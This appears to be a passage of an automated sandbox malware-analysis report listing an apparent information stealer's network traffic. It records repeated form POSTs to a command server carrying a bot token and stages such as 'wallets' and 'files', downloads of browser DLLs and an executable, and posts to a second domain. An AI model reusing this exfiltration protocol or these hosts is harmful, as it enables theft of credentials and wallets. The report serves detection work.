Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFHHost: 5.42.66.58Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 37 63 30 32 36 37 63 30 37 34 31 38 65 63 63 39 38 30 35 36 62 65 32 63 66 32 30 36 38 36 35 61 66 61 30 39 65 66 37 33 37 61 62 64 62 66 30 35 63 33 36 38 64 62 37 66 63 61 34 63 66 61 34 37 37 64 64 66 63 63 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 2d 2d 0d 0a Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="token"147c0267c07418ecc98056be2cf206865afa09ef737abdbf05c368db7fca4cfa477ddfcc------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="message"plugins------GCBGIIECGHCAKECAFBFH--
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHIJEHJDHIDHIDAEHCHost: 5.42.66.58Content-Length: 8263Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/sqlite3.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJDAFIEHIEGDHIDGDGHHost: 5.42.66.58Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBFHost: 5.42.66.58Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKEGHJDHDAFHIDHCFHDHost: 5.42.66.58Content-Length: 355Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 37 63 30 32 36 37 63 30 37 34 31 38 65 63 63 39 38 30 35 36 62 65 32 63 66 32 30 36 38 36 35 61 66 61 30 39 65 66 37 33 37 61 62 64 62 66 30 35 63 33 36 38 64 62 37 66 63 61 34 63 66 61 34 37 37 64 64 66 63 63 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4e 54 55 31 4e 53 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 2d 2d 0d 0a Data Ascii: ------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="token"147c0267c07418ecc98056be2cf206865afa09ef737abdbf05c368db7fca4cfa477ddfcc------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="file_name"NTE5NTU1NS5maWxl------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="file"------AKKEGHJDHDAFHIDHCFHD--
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBKHost: 5.42.66.58Content-Length: 355Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 37 63 30 32 36 37 63 30 37 34 31 38 65 63 63 39 38 30 35 36 62 65 32 63 66 32 30 36 38 36 35 61 66 61 30 39 65 66 37 33 37 61 62 64 62 66 30 35 63 33 36 38 64 62 37 66 63 61 34 63 66 61 34 37 37 64 64 66 63 63 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4e 54 55 31 4e 53 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="token"147c0267c07418ecc98056be2cf206865afa09ef737abdbf05c368db7fca4cfa477ddfcc------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="file_name"NTE5NTU1NS5maWxl------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="file"------CBKJJEHCBAKFBFHJKFBK--
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/freebl3.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/mozglue.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/msvcp140.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/nss3.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/softokn3.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/vcruntime140.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAAHost: 5.42.66.58Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 5.42.66.58Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 37 63 30 32 36 37 63 30 37 34 31 38 65 63 63 39 38 30 35 36 62 65 32 63 66 32 30 36 38 36 35 61 66 61 30 39 65 66 37 33 37 61 62 64 62 66 30 35 63 33 36 38 64 62 37 66 63 61 34 63 66 61 34 37 37 64 64 66 63 63 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="token"147c0267c07418ecc98056be2cf206865afa09ef737abdbf05c368db7fca4cfa477ddfcc------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="message"wallets------HDGCFHIDAKECFHIEBFCG--
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIJJKKFHIEHJKECGCGCHost: 5.42.66.58Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 37 63 30 32 36 37 63 30 37 34 31 38 65 63 63 39 38 30 35 36 62 65 32 63 66 32 30 36 38 36 35 61 66 61 30 39 65 66 37 33 37 61 62 64 62 66 30 35 63 33 36 38 64 62 37 66 63 61 34 63 66 61 34 37 37 64 64 66 63 63 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 2d 2d 0d 0a Data Ascii: ------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="token"147c0267c07418ecc98056be2cf206865afa09ef737abdbf05c368db7fca4cfa477ddfcc------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="message"files------FIIJJKKFHIEHJKECGCGC--
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBAKEHIEBKJJJJJKKKEGHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGIIHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCAAEHJDBKJJKFHJEBKHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHDHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHCAKKEGCAAFHJJJDBKJHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAFHIIJJECGDHIEGDAKHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJDGCGDAAKEBGDBKFHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJKJJKEBGHJKFIDGCAHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEHHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCFIDAKJDHIECBFCBKKHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHIIHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBFBFIIJDAKECAKKJEHHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIJJEGDBFIIDGCAKJEBHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEHHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBAKJDBKJJKFIDBGHCHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECFIJDAAKEBGCGHIEHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKEBGCGHIDHCBFHIDGHHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCGDBAKKKFBGDHJKFHJHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBFHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECFHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBFHJDAAFBAKEBGIJKKHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGIIHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBGCAFIIECBFIDHIJHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFCBFHJDHJKECAKEHIDHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAEHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAFCAKEHDHDHIDHDGDHHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDBAFHJJDAKEBGCFCBGHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCFHDHIIIECBGCAKFIJHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFCBFHJDHJKECAKEHIDHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCAAEBGCAKKFIDBKJJHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAEHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFBHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECGDBFCBKFIDHIDHDHHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCFHDHIIIECBGCAKFIJHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJKHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJEHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEHHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAECHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKJKFHCAEGDHIDGDHDAHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFBHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGDHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEGCBFHJDGCBFHDAFBHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBFHost: 5.42.66.58Content-Length: 151215Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJKHost: 5.42.66.58Content-Length: 264Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 37 63 30 32 36 37 63 30 37 34 31 38 65 63 63 39 38 30 35 36 62 65 32 63 66 32 30 36 38 36 35 61 66 61 30 39 65 66 37 33 37 61 62 64 62 66 30 35 63 33 36 38 64 62 37 66 63 61 34 63 66 61 34 37 37 64 64 66 63 63 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 64 6f 6e 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 2d 2d 0d 0a Data Ascii: ------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="token"147c0267c07418ecc98056be2cf206865afa09ef737abdbf05c368db7fca4cfa477ddfcc------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="message"done------DAKFIDHDGIEGCAKFIIJK--

Source: Joe Sandbox View	IP Address: 172.67.176.11 172.67.176.11
Source: Joe Sandbox View	IP Address: 91.92.254.7 91.92.254.7

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: iplogger.com

Source: global traffic	HTTP traffic detected: GET /testing77777/appdevlompent55555555/downloads/M5traider.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /1bee3bfb-d231-4c42-80c1-836b79e3e5b0/downloads/b6496915-3881-4826-90f1-0b8d8e139169/M5traider.exe?response-content-disposition=attachment%3B%20filename%3D%22M5traider.exe%22&AWSAccessKeyId=ASIA6KOSE3BNPACMPVWP&Signature=VykWqZsmiqhA27rtu14Ozvrz3gU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECEaCXVzLWVhc3QtMSJHMEUCIC9ZJg5LyShpGCfgK9xBd%2BNfXFo5Jl1BokDusFXKUzl1AiEA7f8F1VXwUrCxToTOc9Slu8foenPFBkDfJnlad1jjyqQqsAIIqv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMt7cSR0FVvzrB4MKCqEAs00XLyqwgYvgllfcxxML0V7rNRQULIYUBLpqfwSi9NIlid8dZk0%2BkGa6LzBU0w6EZSdIbxY8T0HGRIy4ZsgthFREXzWAJvv1bbeEJRcDnTvAVTJxKFeB%2FJ8djugQ%2BBJpgk6n%2BRuptcwKHcsxg4%2F19qZXXKG%2FS8DS0INAd%2FZYDox5Xtff6S7qGXsd%2FGip83XMBWLlHwlAHQmWYi25uFpdF02FjEwFpDk3lqQIQ0C0IhUEKiMterg%2BQ2T4z43peg4F1tv%2B2%2Fh3DEVPw5PGYAhfZJqBM2ejvqzpeKHz9BnVWHPxh1jEKjbfGI1A1QDq%2FOUZasoV7JfQ1aluRvMaNJTn4QEcM88MIOpsawGOp0B6A%2BOtuswH3ZDYA1WLInRm1gRHfBtEnqS%2BFl62PAReCq9Ma%2Fr0ln5Qz3Kj%2Bn51V6V6693cTWiS1oTuWfeFfQKHnaD0HR7grGubgANmsvIN%2FpCehFQUeWye4C2Fch1mk9u9QQNz%2BcCQ%2BEQzhLnnYUcZ6txuTVH29pM9tUcxooY9Nfr2MEEK9zd%2BfdQJsuyu7UM68N4AaSa6d75Keav8g%3D%3D&Expires=1703697292 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: chincenterblandwka.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 635Host: chincenterblandwka.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 60Host: chincenterblandwka.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 641Host: chincenterblandwka.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19507Host: chincenterblandwka.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 9617Host: chincenterblandwka.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20443Host: chincenterblandwka.pw
